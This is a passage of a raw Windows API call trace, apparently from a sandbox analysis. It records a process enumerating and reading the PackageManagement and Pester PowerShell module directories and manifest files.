[0170.836] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8a730 | out: lpFindFileData=0xb156f8a730*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0170.836] FindClose (in: hFindFile=0x1e35146b720 | out: hFindFile=0x1e35146b720) returned 1 [0170.836] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a990) returned 1 [0170.836] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a950) returned 1 [0170.836] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x105, lpBuffer=0xb156f8a630, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0170.836] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa80) returned 1 [0170.836] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0xb156f8ab60 | out: lpFileInformation=0xb156f8ab60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8)) returned 1 [0170.837] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8aa40) returned 1 [0170.837] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x105, lpBuffer=0xb156f8a340, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0170.837] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8a820) returned 1 [0170.837] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x458 [0170.837] GetFileType (hFile=0x458) returned 0x1 [0170.837] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a790) returned 1 [0170.837] GetFileType (hFile=0x458) returned 0x1 [0170.837] ReadFile (in: hFile=0x458, lpBuffer=0x1e3396212d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8a8f8, lpOverlapped=0x0 | out: lpBuffer=0x1e3396212d0*, lpNumberOfBytesRead=0xb156f8a8f8*=0x5f8, lpOverlapped=0x0) returned 1 [0170.837] ReadFile (in: hFile=0x458, lpBuffer=0x1e339620808, nNumberOfBytesToRead=0x208, lpNumberOfBytesRead=0xb156f8a8f8, lpOverlapped=0x0 | out: lpBuffer=0x1e339620808*, lpNumberOfBytesRead=0xb156f8a8f8*=0x0, lpOverlapped=0x0) returned 1 [0170.838] ReadFile (in: hFile=0x458, lpBuffer=0x1e3396212d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8a8f8, lpOverlapped=0x0 | out: lpBuffer=0x1e3396212d0*, lpNumberOfBytesRead=0xb156f8a8f8*=0x0, lpOverlapped=0x0) returned 1 [0170.838] CloseHandle (hObject=0x458) returned 1 [0170.841] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff [0170.841] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psm1")) returned 0xffffffff [0170.841] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.cdxml")) returned 0xffffffff [0170.841] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.xaml")) returned 0xffffffff [0170.841] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.dll")) returned 0xffffffff [0170.841] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa00) returned 1 [0170.841] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0xb156f8a4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0170.842] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\*"), lpFindFileData=0xb156f8a710 | out: lpFindFileData=0xb156f8a710*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e35146b240 [0170.842] FindNextFileW (in: hFindFile=0x1e35146b240, lpFindFileData=0xb156f8a6d0 | out: lpFindFileData=0xb156f8a6d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0170.842] FindNextFileW (in: hFindFile=0x1e35146b240, lpFindFileData=0xb156f8a6d0 | out: lpFindFileData=0xb156f8a6d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0170.842] FindNextFileW (in: hFindFile=0x1e35146b240, lpFindFileData=0xb156f8a6d0 | out: lpFindFileData=0xb156f8a6d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0170.843] FindClose (in: hFindFile=0x1e35146b240 | out: hFindFile=0x1e35146b240) returned 1 [0170.843] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a930) returned 1 [0170.843] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a8f0) returned 1 [0170.843] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa00) returned 1 [0170.843] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0xb156f8a4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0170.843] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\*"), lpFindFileData=0xb156f8a710 | out: lpFindFileData=0xb156f8a710*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e35146a940 [0170.843] FindNextFileW (in: hFindFile=0x1e35146a940, lpFindFileData=0xb156f8a6d0 | out: lpFindFileData=0xb156f8a6d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0170.844] FindNextFileW (in: hFindFile=0x1e35146a940, lpFindFileData=0xb156f8a6d0 | out: lpFindFileData=0xb156f8a6d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0170.844] FindNextFileW (in: hFindFile=0x1e35146a940, lpFindFileData=0xb156f8a6d0 | out: lpFindFileData=0xb156f8a6d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 0 [0170.844] FindClose (in: hFindFile=0x1e35146a940 | out: hFindFile=0x1e35146a940) returned 1 [0170.844] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a930) returned 1 [0170.844] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a8f0) returned 1 [0170.844] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8a870) returned 1 [0170.844] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0xb156f8a350, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0170.845] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\*"), lpFindFileData=0xb156f8a580 | out: lpFindFileData=0xb156f8a580*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e35146ae20 [0170.845] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0170.845] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0170.845] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0170.846] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0170.846] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0170.846] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0170.846] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0170.847] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0170.847] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0170.847] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0170.847] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0170.847] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0170.848] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0170.848] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0170.848] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0170.848] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0170.848] FindClose (in: hFindFile=0x1e35146ae20 | out: hFindFile=0x1e35146ae20) returned 1 [0170.849] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a7a0) returned 1 [0170.849] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a760) returned 1 [0170.849] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8a870) returned 1 [0170.849] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0xb156f8a350, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0170.849] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\*"), lpFindFileData=0xb156f8a580 | out: lpFindFileData=0xb156f8a580*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e35146b060 [0170.849] FindNextFileW (in: hFindFile=0x1e35146b060, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0170.849] FindNextFileW (in: hFindFile=0x1e35146b060, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0170.850] FindNextFileW (in: hFindFile=0x1e35146b060, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0170.850] FindNextFileW (in: hFindFile=0x1e35146b060, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0170.850] FindNextFileW (in: hFindFile=0x1e35146b060, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0170.850] FindNextFileW (in: hFindFile=0x1e35146b060, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0170.851] FindNextFileW (in: hFindFile=0x1e35146b060, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0170.851] FindNextFileW (in: hFindFile=0x1e35146b060, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, 